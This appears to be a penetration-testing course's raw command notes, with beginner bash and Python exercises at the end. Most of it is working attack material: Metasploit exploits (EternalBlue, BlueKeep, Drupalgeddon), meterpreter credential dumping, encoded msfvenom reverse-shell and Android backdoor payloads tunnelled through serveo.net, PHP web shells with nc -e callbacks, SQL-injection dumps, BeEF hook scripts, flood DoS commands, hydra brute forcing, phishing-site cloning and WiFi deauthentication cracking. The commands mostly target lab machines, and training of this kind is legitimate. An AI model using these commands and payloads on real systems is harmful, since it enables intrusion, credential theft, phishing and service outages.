info exploit/windows/local/current_user_psexec
use exploit/windows/local/current_user_psexec
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.0.200
set SESSION 1
set LPORT 5599
exploit

meterpreter > load kiwi


meterpreter > hashdump
meterpreter > creds_all
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.0.200
set LHOST 192.168.0.175
set LPORT 5599
exploit

search ms17-010
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/reverse_tcp
show options
set RHOST 192.168.0.200
set LHOST 192.168.0.175
set LPORT 4567
exploit

Try to exploit ms17-010 without using msfconsole

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git


cd AutoBlue-MS17-010
pip install -r requirements.txt

cd shellcode
ls
./shell_prep.sh

kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom?
(Y/n)
y
LHOST for reverse connection:
192.168.0.175
LPORT you want x64 to listen on:
6677
LPORT you want x86 to listen on:
6688
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
cd ..
ls -l
chmod u+x eternalblue*
ls -l

python eternalblue_exploit8.py 192.168.0.200 shellcode/sc_x64.bin

NEW TERMINAL
nc -nlvp 6677

python eternalblue_exploit8.py 192.168.0.200 shellcode/sc_x64.bin

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.175 LPORT=4567 -f


exe -o /root/Desktop/sc.exe
cd Desktop
python -m http.server 8999

IN WINDOWS TYPE http://192.168.0.175:8999/sc.exeS

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.175
set LPORT 4567
exploit -j
sessions
sessions -i 1

meterpreter > sysinfo


meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token KINGSMEN\\Administrator
meterpreter > background

search user_psex
use exploit/windows/local/current_user_psexec
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show options
set RHOSTS 192.168.0.200
set SESSION 1
show options
set LPORT 5533
exploit
https://gofile.io/d/GvDbIZ

md5sum user.txt
sha1sum user.txt
sha256sum user.txt

https://www.quickhash-gui.org/downloads/

$1$ MD5
$5$ sha 256
$6$ sha 512
$2y$ eksblowfish

hash-identifier

john --list=formats
john --format=Raw-MD5 /root/hash1.txt

john --list=formats
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1 /root/hash2.txt

F1CF651CE1A2191A760C0B2F161234F7958E26E4 (rockyou)

4BC48E00300464D2670958AB3C8982EA (india123)
7C222FB2927D828AF22F592134E8932480637C0D (12345678)

https://crackstation.net/

ps aux | grep john


kill -9 54124

msfvenom --list encoders


msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -i 5 LHOST=192.168.0.125
LPORT=4567 -f exe -o /root/Desktop/win1.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4567 -f exe -o


/root/Desktop/win2.exe

upx win2.exe -o win2encoded.exe


strings -a win2encoded.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4566 -x


filename1.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e
x86/countdown -i 9 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 8 -f exe -o
multiencoded.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4569 -f exe -o


/root/Desktop/win32.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4569 -f exe


-o /root/Desktop/win64.exe

cd /root/Desktop
ls
file win32.exe
file win64.exe

xxd -l 20 win32.exe

https://en.wikipedia.org/wiki/List_of_file_signatures

https://www.virustotal.com/gui/home/upload

md5sum win64.exe
sha1sun win64.exe

strings -a win64.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4569 -f exe


-o /root/Desktop/win64.exe
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.125
set LPORT 4569
exploit -j

process hacker
netstat -ano
tasklist /v
Event viwer>Applications and Services Logs > Microsoft > Windows > Windows
Defender>operational

1000
1001
1006
1116
1117

ssh -R 4599:localhost:4222 serveo.net

New terminal
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4599 -f exe -o
/root/Desktop/winwan1.exe

msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4222
exploit -j

ssh -R 9696:localhost:9966 serveo.net


new terminal
msfconsole
use exploit/windows/misc/hta_server
set LHOST serveo.net
set LPORT 9696
exploit -j

http://192.168.0.125:8080/dw7iNPS5.hta
(kali ip)
download in kali system and upload the file in gofile.io

In same console
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 9966
exploit -j

apt update
apt install tor
service tor start
mousepad /etc/proxychains4.conf
Remove # in dynamic_chains
add # in #strict_chain

End of line
socks5 127.0.0.1 9050

service tor restart


proxychains firefox

ip.addr==192.168.0.100
tcp
tcp.port==80
udp.port==53

ip.addr==192.168.0.100 && tcp.port==443

1)type of attack
2)attacker ip address

cd /root/Downloads
ls
unzip vpnbook-openvpn-de20.zip
ls
cd vpnbook-openvpn-de20
openvpn vpnbook-de20-tcp80.ovpn

https://www.vpnbook.com/#google_vignette

protonvpn debian install

https://protonvpn.com/support/official-linux-vpn-debian?srsltid=AfmBOoqJy93kwa8XPY946kOg
bMmLiulahSEIzJfaPhJ2DmHHo6elU-m4

wget
https://repo.protonvpn.com/debian/dists/stable/main/binary-all/protonvpn-stable-release_1.0.4_a
ll.deb

sudo dpkg -i ./protonvpn-stable-release_1.0.4_all.deb && sudo apt update

sudo apt install proton-vpn-gnome-desktop


protonvpn-app

apt install steghide


steghide
steghide --embed -ef user.txt -cf /root/Downloads/new1.jpeg -sf stegnofile.jpeg
steghide --extract -sf stegnofile.jpeg

THE LOGIN ‍⁤⁢‌⁣⁡CERD FOE GMAIL ACCOUNT

MY ‍⁡⁣⁢⁤‌MAIL ID
https://download.vulnhub.com/gigachad/gigachad_vh.ova

https://github.com/bcoles/local-exploits/blob/master/CVE-2017-5899/exploit.sh
username:chad
password :maidenstower

filetype:pdf ibm qradar documentation


ibm qradar documentation

https://www.ibm.com/docs/en/SS42VS_7.5/pdf/b_qradar_admin_guide.pdf

https://docs.splunk.com/Documentation

#!/bin/bash
#NMAP HOST DISCOVERY SCAN
echo "PERFORMING HOST ALIVE SCAN"
echo "PLEASE ENTER THE SCAN RANGE: "
read ip_range
nmap -sn $ip_range -oG out.txt
cat out.txt | grep Up > out1.txt
cat out1.txt | cut -d " " -f 2 > out2.txt

echo "PERFORMING PORT SCAN"


echo "ENTER PORT NUMBER TO SCAN"
read port_number
nmap -p $port_number -iL out2.txt -oG out3.txt
cat out3.txt | grep open > out4.txt
cat out4.txt | cut -d " " -f 2 > out5.txt
value=$(<out5.txt)
echo "$value"

echo "SELECT IP ADDRESS TO PERFORM PASSWORD CRACKING: "


read ip_password
echo "ENTER PROTOCOL NAME: "
read service_name
hydra -L /root/userpass.txt -P /root/userpass.txt $ip_password -s $port_number $service_name

Write python program to add 2 number (#input from user)

nmap -A 192.168.0.165

searchsploit drupal 7
searchsploit -m php/webapps/34992.py
python2 34992.py
python2 34992.py -t http://192.168.0.165 -u king -p 1234

msfconsole
search drupal
use exploit/multi/http/drupal_drupageddon
set RHOSTS 192.168.0.165
set LPORT 5566
exploit

meterpreter > getuid


Server username: www-data
meterpreter > shell
Process 1036 created.
Channel 1 created.

bash -i
sudo -l
www-data@HackerSchool:/home/jack$ sudo -u harry find . -exec /bin/sh \; -quit
whoami
bash -i
find / -perm -u=s

harry@HackerSchool:/home/jack$ cd /usr/bin/What_are/you/_searching_/for?/
cd /usr/bin/What_are/you/_searching_/for?/
harry@HackerSchool:/usr/bin/What_are/you/_searching_/for?$ ls
ls
iamhere
harry@HackerSchool:/usr/bin/What_are/you/_searching_/for?$ ./iamhere

http://burp/

P1
admin
test

P2
1234
toor

admin 1234
admin toor
test 1234
test toor

192.168.1.100
192.168.1.200

msfvenom -p php/reverse_php LHOST=192.168.0.155 LPORT=4569 -f raw -o


/root/Desktop/webshell1.php

msfconsole
use multi/handler
set payload php/reverse_php
set LHOST 192.168.0.155
set LPORT 4569
exploit -j

Upload the file in browser


Execute in browser
http://192.168.0.146/dvwa/hackable/uploads/webshell1.php

cd /usr/share/webshells/php

BURP SUITE

Content-Type: image/jpeg

http://192.168.0.146/dvwa/hackable/uploads/simple-backdoor.php?cmd=nc -e /bin/sh
192.168.0.155 4566
nc -nlvp 4566

cd /usr/share/webshells/php
mousepad php-reverse-shell.php
$ip = '192.168.0.155'; // CHANGE THIS
$port = 3344; // CHANGE THIS

filename="php-reverse-shell.php.jpg"

Content-Type: image/jpg

192.168.0.146/dvwa/hackable/uploads/php-reverse-shell.php.jpg

nc -nlvp 3344

apt update
apt install docker.io
docker pull bkimminich/juice-shop

Run docker run --rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop

http://127.0.0.1:3000/#/score-board

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#
http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' order by 1--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' order by 2--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' order by 3--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' UNION SELECT 1,2--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=3' UNION SELECT


database(),version()--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' UNION SELECT


1,group_concat(table_name) from information_schema.tables where
table_schema=database()--+&Submit=Submit#
http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' UNION SELECT
1,group_concat(column_name) from information_schema.columns where
table_name='users'--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' UNION SELECT


1,group_concat(user_id,0x3d,first_name,0x3d,last_name,0x3d,user,0x3d,password,0x3d,avatar
) from users--+&Submit=Submit#

admin,contact,department,external_link,library,menu,page,photo_album,photos,scroller,site,slid
er,students,students_attendance,tbl_admin,teacher_staff,teacher_staff_attendance,videos

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=4de718548928f93c712620aeb487fb65;security=low" --dbs

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=4de718548928f93c712620aeb487fb65;security=low" -D dvwa --tables

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=4de718548928f93c712620aeb487fb65;security=low" -D dvwa -T users
--columns

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=4de718548928f93c712620aeb487fb65;security=low" -D dvwa -T users
-C user,first_name,last_name,password,user_id --dump

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C
name,addess,cart,cc,email,pass --dump

jsql

apt update
apt install jsql

jsql
http://testphp.vulnweb.com/artists.php?artist=1

try on altoromutual.com
<script>alert("CSP XSS ATTACK")</script>
login to webpage admin:admin
<script>alert(document.cookie)</script>
<iframe src="https://hackerschool.in"></iframe>

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay"


src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&c
olor=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&
show_reposts=false&show_teaser=true"></iframe>

hydra -v -V -s 80 altoromutual.com -L /root/username.txt -P /root/password.txt http-post-form


"/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:F=Login Failed"

TRY ON DVWA LOGIN WEBPAGE

hydra -v -V -s 80 192.168.0.125 -L /root/username.txt -P /root/password.txt http-post-form


"/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed"

nmap 192.168.0.150
nmap 192.168.0.150 -p 80 -A
dirb http://192.168.0.150
mousepad /etc/hosts

#EOF ADD
192.168.0.150 hackerschool.local

dirb http://hackerschool.local/

http://hackerschool.local/wp-admin

crunch 7 7 1891968 -o wordlist1.txt

wpscan --url
"http://hackerschool.local/wp-login.php?redirect_to=http%3A%2F%2Fhackerschool.local%2Fwp
-admin%2F&reauth=1" -U admin -P /root/wordlist1.txt

[SUCCESS] - admin / 1891968

Apperance-->editor--> 404.php
cd /usr/share/webshells/php
ls
mousepad php-reverse-shell.php
#REPLACE IP

hackerschool.local/wp-content/themes/twentyseventeen/404.php

nc -nlvp 1234

sudo -l
cd /var/www/html
sudo ./hs.sh

apt update
apt install zaproxy

http://192.168.0.114/mutillidae/index.php?page=text-file-viewer.php

apt update
apt install beef-xss
beef-xss

#SCRIPT FOR HOOKING THE BROWSER


#EXECUTE IN DVWA ON XSS STORED
<script src="http://192.168.0.155:3000/hook.js"></script>

FROM BASE SYSTEM TRY TO ACCESS DVWA WEB PAGE

msfconsole
search synflood
use auxiliary/dos/tcp/synflood
set RHOSTS 192.168.0.114
exploit

git clone https://github.com/gkbrk/slowloris.git


cd slowloris
ls
./slowloris.py 192.168.0.114

hping3 -h
hping3 -S 192.168.0.114 -p 80 --flood
hping3 -S 192.168.0.114 -p 80 --flood --rand-source
nmap -p 53,67,161,514 -sU 192.168.0.114
hping3 -h
hping3 -2 -p 53 192.168.0.114 --flood
hping3 -2 -p 53 192.168.0.114 --flood --rand-source

hping3 -1 192.168.0.220 --flood


hping3 -1 192.168.0.220 --flood --rand-source

msfconsole
search rdp type:auxiliary
use auxiliary/scanner/rdp/ms12_020_check
show options
set RHOSTS 192.168.0.165
run

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOSTS 192.168.0.165
exploit

TRY FOR MULTI TIME

#include <stdio.h>
#include <string.h>

int main(void)
{
char buff[15];
int pass = 0;

printf ("\n Enter the password: \n");


gets(buff);

if(strcmp(buff, "hacker"))
{
printf("\n worng password\n");
}
else
{
printf("\n Correct password\n");
}
}
nc 192.168.0.165 9999

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 700

search cve-2019-0708
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS 192.168.0.165
exploit

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS 192.168.0.165
set LPORT 4567
show options
show targets
set target 2
exploit

lbd flipkart.com
wafw00f https://hackerschool.in

jsmith
demo1234

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.187 LPORT=5566 R -o


/root/Desktop/msf.apk

cp msf.apk /var/www/html
service apache2 start

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.187
set LPORT 5566
exploit -j

IN ANDROID
192.168.0.187/msf.apk

meterpreter > sysinfo


apt update
apt install apktool
apktool d msf.apk

cd msf
ls
mousepad AndroidManifest.xml

unzip -d android msf.apk


cd android

apt search dex2jar


apt install dex2jar
d2j-dex2jar classes.dex

apt search jd-gui


apt install jd-gui
jd-gui classes-dex2jar.jar

apt search adb


apt install adb
adb devices
adb connect 192.168.0.153:5555
adb devices
adb shell

adb devices
adb connect 192.168.0.102:5555
adb devices
adb root
adb shell
x86_64:/ # logcat

https://gofile.io/d/wiEKQk
unzip -d test DivaApplication.apk
cd test
d2j-dex2jar classes.dex
jd-gui classes-dex2jar.jar

/data/data/jakhar.aseem.diva/shared_prefs

x86_64:/data/data/jakhar.aseem.diva/databases
sqlite3 ids2
sqlite> .tables

sqlite> select * from myuser;

adb shell am start -n jakhar.aseem.diva/.APICredsActivity

cd Downloads
chmod 400 CSP1.pem
ssh -i "CSP1.pem" kali@ec2-3-87-131-107.compute-1.amazonaws.com
sudo passwd root
su root
apt update
apt install apache2
service apache2 start
apt install msfpc
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=3.87.131.107 LPORT=5599 -f exe
-o /var/www/html/win.exe

msf6 exploit(multi/handler) > set LHOST 172.31.43.146

setoolkit
1
2
3
2
KALI IP ADDRESS
URL

IN BROWSER ENTER THE IP ADDRESS

ssh -R 80:localhost:80 serveo.net

git clone https://github.com/htr-tech/zphisher.git


ls
cd zphisher
ls
./zphisher.sh

cd /etc/setoolkit
mousepad set.config
APACHE_SERVER=ON
ctrl+s

cd /var/www/html
rm -rf *

setoolkit
1
2
3
2
KALI IP ADDRESS
https://altoromutual.com/login.jsp

cd /var/www/html
ls

iwconfig
airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng --essid "Hack-Me" --bssid 60:63:4C:6F:3E:59 --channel 1 --write


wifipasswordcracking1 wlan0mon

aireplay-ng -0 10 -a 60:63:4C:6F:3E:59 -c 04:92:26:9F:9B:C3 -e "Hack-Me" wlan0mon

aircrack-ng wifipasswordcracking1-01.cap -w /usr/share/wordlists/wifite.txt

wifite --dict /usr/share/wordlists/wifite.txt

fern wifi cracker

Netsh wlan show profile name=”Wi-F name” key=clear

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.187 LPORT=4567 -f raw -o


/root/Desktop/rasp.py
cd Desktop
python -m http.server

msfconsole
use multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.187
set LPORT 4567
exploit -j

wget http://192.168.0.187:8000/rasp.py
chmod +x rasp.py
python rasp.py

touch pgm1.sh

mousepad pgm1.sh

#!/usr/bin/bash
echo "Hello World"

chmod +x pgm1.sh

./pgm1.sh
/usr/bin/bash pgm1.sh

#!/usr/bin/bash
echo "Hello World"

name=hackerschool
pincode=560041
echo $name $pincode

ip2=192.168.0.107
portno=22
echo "scanning for ip $ip2 on portnumber $portno"

user="`whoami`"
echo $user

user1=$(whoami)
echo $user1

10+5
$((...))
#!/bin/bash

echo "Enter the first number: "


read num1
echo "Enter the second number: "
read num2

result=$((num1+num2))
echo "The answer is $result"

#!/bin/bash

result=$(($1+$2))
echo "The answer is $result"

NOTE: ./add.sh 10 5

#!/bin/bash

num1=10
num2=5

result=$((num1+num2))
echo "The answer is $result"

#!/bin/bash
read -p "Enter the username:" username
read -sp "Enter the password:" password

echo -e "\n the username is $username and password is $password"


enable escape char(-e)

if [ condition ]
then
perform
fi

if [ condition ]
then
perform
else
perform
fi
if [condition]
then
perform
elif [condition]
then
perform
else
perform
fi

#!/bin/bash
read -p "ENTER THE YEAR:" year
if [ $year -lt 2024 ]
then
echo "past"
elif [ $year -gt 2024 ]
then
echo "future"
else
echo "present"
fi

age<18 (YOUNG)
age>18 (ADULT)
age=18 (YOUNG AND ADULT) (-eq)

#!/bin/bash
read -p "ENTER THE age:" age
if [ $age -lt 18 ]
then
echo "YOUNG"
elif [ $age -eq 18 ]
then
echo "YOUNG AND ADULT"
else
echo "ADULT"
fi
for <var name> in <list>
do
<perform>
done

for i in 1 2 3 4 5
do
echo $i
done

#!/bin/bash
for word in {a..z}
do
echo $word
done

#!/bin/bash
for i in {1..2}
do
echo $i
done

#!/bin/bash
for ip in {100..150}
do
ping -c 1 192.168.0.$ip | grep "bytes from"
done

TRY WITH ARG AND USER INPUT

#!/bin/bash
echo "RUN SCRIPT USING COMMAND ./pingsweep.sh 192.168.0"
for ip in {100..150}
do
ping -c 1 $1.$ip | grep "bytes from"
done

#!/bin/bash
echo "ipaddress format:- 10.0.0"
echo "ENTER IP ADDRESS TO SCAN: "
read ipaddr
for ip in {100..150}
do
ping -c 1 $ipaddr.$ip | grep "bytes from"
done
#!/bin/bash
echo "ipaddress format:- 10.0.0"
echo "ENTER IP ADDRESS TO SCAN: "
read ipaddr
for ip in {100..150}
do
ping -c 1 $ipaddr.$ip | grep "bytes from" | cut -d " " -f 4 | tr -d ":"
done

#!/usr/bin/python
print ("Hello world")
print ('Hello world')

print (50+25)
print (23-5)
print (3*67)
print (15/3)

print ("""please enter the input


scan started""")

name="HACKERSCHOOL"
place="BANGALORE"
a="new"
b=22

print ("welcome to " + name + " from " + place )

x=input("enter your name: ")


print ("your name is " + x

#!/usr/bin/python
x=input("Enter the first number: ")
y=input("Enter the second number: ")
z=int(x)+int(y)
print ("THE RESULT IS " + str(z))

a = int(input("Enter first number :"))


b = int(input("Enter Second number :"))
result = a + b
print(result)

#!/usr/bin/python
port = ["80","8080","443","8443"]
print(port[1])
print(port[2])
print(port[0:4])

fruits = ["apple","orange","graps"]
print(fruits[2])
port.append("8081")
print(port)
port.remove("8080")
print(port)

if <condition>:
<perform>
else:
<perform>

if <condition>:
<perform>
elif <condition>:
<perform>
else:
<perform>

#!/usr/bin/python
num=input("Enter your age: ")
if int(num)>60:
print ("You are old")
else:
print ("you are adult")

#!/usr/bin/python
num=input("Enter your age: ")
if int(num)>60:
print ("You are old")
elif int(num)>=18:
print ("you are adult")
else:
print ("you are young")

for <var name> in <list>:


<perform>
#!/usr/bin/python
food=["fruits","veg","seed"]
for line in food:
print(line)

#!/usr/bin/python
file=open ("/root/user.txt","r")
for line in file:
print(line)

#!/usr/bin/python
import sys
print (sys.version)

#!/usr/bin/python
import socket

host="127.0.0.1"
port=1234

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))

nc -nlvp 1234

#!/usr/bin/python
import platform
import os

network_ip=input("Enter ip addres to scan: ")

first_host=int(input("enter first ip: "))


last_host=int(input("enter last ip: "))

oper=platform.system()

if (oper=="Windows"):
ping="ping -n 1 "
else:
ping="ping -c 1 "

print ("START SCAN")

for ip in range(first_host,last_host):
addr = network_ip + str(ip)
command = ping + addr
response = os.popen(command)
list = response.readlines()

for line in list:


if(line.count("bytes from")):
print(addr)
break

print ("scan end")

#!/usr/bin/python
def add (a,b):
print (int(a) + int(b))

x=input("enter a: ")
y=input("enter b: ")
add (x,y)

import socket
from datetime import datetime

def port_scan(target, start_port, end_port):


# Print the starting time of the scan
print(f"Scanning {target} from port {start_port} to {end_port}...")
start_time = datetime.now()

# Iterate through the specified port range


for port in range(start_port, end_port + 1):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1) # Set a timeout for the connection attempt
result = sock.connect_ex((target, port)) # Try to connect to the port

if result == 0:
print(f"Port {port}: Open")
else:
print(f"Port {port}: Closed")

sock.close()

# Print the total time taken for the scan


end_time = datetime.now()
duration = end_time - start_time
print(f"\nScan completed in: {duration}")

if __name__ == "__main__":
# Specify the target and port range
target_ip = input("Enter the target IP or hostname: ")
start_port = int(input("Enter the starting port: "))
end_port = int(input("Enter the ending port: "))

port_scan(target_ip, start_port, end_port)

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy